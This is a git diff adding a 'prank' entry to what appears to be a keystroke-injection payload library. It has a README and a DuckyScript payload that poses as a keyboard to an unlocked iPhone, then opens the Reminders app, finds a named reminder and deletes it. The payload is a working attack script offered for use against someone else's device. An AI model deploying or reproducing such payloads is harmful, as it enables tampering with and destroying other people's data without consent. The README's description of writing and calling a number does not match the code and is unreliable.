diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md
new file mode 100644
index 000000000..0494bdb3b
--- /dev/null
+++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md
@@ -0,0 +1,51 @@
+# Delete A Reminder With An iPhone
+
+This script can be used to delete a reminder really fast using an iPhone, so iOS system.
+
+**Category**: Prank
+
+## Description
+
+This script can be used to delete a reminder really fast using an iPhone, so iOS system.
+
+Open search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
+
+## Dependencies
+
+* The phone must be unlocked
+
+## Settings
+
+- You need to change the name of the application according to the language you have on your phone.
+
+ ```DuckyScript
+ REMINDER-APP-NAME='Promemoria'
+ ```
+
+- You should know the reminder name that you want to delete
+
+```DuckyScript
+ REMINDER-NAME='example'
+```
+
+## Credits
+
+
Aleff
+
+
+
+
+
+
+
+ Github
+ |
+
+
+
+
+ Linkedin
+ |
+
+
+
\ No newline at end of file
diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt
new file mode 100644
index 000000000..a606bff23
--- /dev/null
+++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt
@@ -0,0 +1,39 @@
+* REM #####################################################
+* REM # #
+* REM # Title : Delete A Reminder With An iPhone #
+* REM # Author : Aleff #
+* REM # Version : 1.0 #
+* REM # Category : Prank #
+* REM # Target : iPhone #
+* REM # #
+* REM #####################################################
+
+ATTACKMODE HID
+
+* REM Requirements:
+* REM - The phone must be unlocked
+
+QUACK REM VARIABLES
+* REM 1) You need to change the name of the application according to the language you have on your phone.
+REMINDER-APP-NAME='Promemoria'
+* REM 2) You should know the reminder name that you want to delete
+REMINDER-NAME='example'
+
+QUACK DELAY 1500
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING $REMINDER-APP-NAME
+QUACK ENTER
+QUACK DELAY 2000
+QUACK GUI f
+QUACK DELAY 1000
+QUACK STRING $REMINDER-NAME
+QUACK DELAY 500
+QUACK TAB
+QUACK DELAY 500
+QUACK GUI a
+QUACK BACKSPACE
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK GUI h